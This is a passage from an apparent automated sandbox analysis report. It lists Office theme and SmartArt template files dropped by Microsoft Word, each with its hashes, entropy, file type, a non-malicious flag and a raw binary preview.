                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2924237
                                    Entropy (8bit):7.970803022812704
                                    Encrypted:false
                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                    Malicious:false
                                    Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2357051
                                    Entropy (8bit):7.929430745829162
                                    Encrypted:false
                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3611324
                                    Entropy (8bit):7.965784120725206
                                    Encrypted:false
                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1091485
                                    Entropy (8bit):7.906659368807194
                                    Encrypted:false
                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                    MD5:2192871A20313BEC581B277E405C6322
                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                    Malicious:false
                                    Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):608122
                                    Entropy (8bit):7.729143855239127
                                    Encrypted:false
                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                    Malicious:false
                                    Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5783
                                    Entropy (8bit):7.88616857639663
                                    Encrypted:false
                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                    Malicious:false
                                    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4026
                                    Entropy (8bit):7.809492693601857
                                    Encrypted:false
                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                    Malicious:false
                                    Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4243
                                    Entropy (8bit):7.824383764848892
                                    Encrypted:false
                                    SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                    MD5:7BC0A35807CD69C37A949BBD51880FF5
                                    SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                    SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                    SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                    Malicious:false
                                    Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):16806
                                    Entropy (8bit):7.9519793977093505
                                    Encrypted:false
                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):11380
                                    Entropy (8bit):7.891971054886943
                                    Encrypted:false
                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):6024
                                    Entropy (8bit):7.886254023824049
                                    Encrypted:false
                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):9191
                                    Entropy (8bit):7.93263830735235
                                    Encrypted:false
                                    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                    Malicious:false
                                    Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4326
                                    Entropy (8bit):7.821066198539098
                                    Encrypted:false
                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                    Malicious:false
                                    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                    Download File
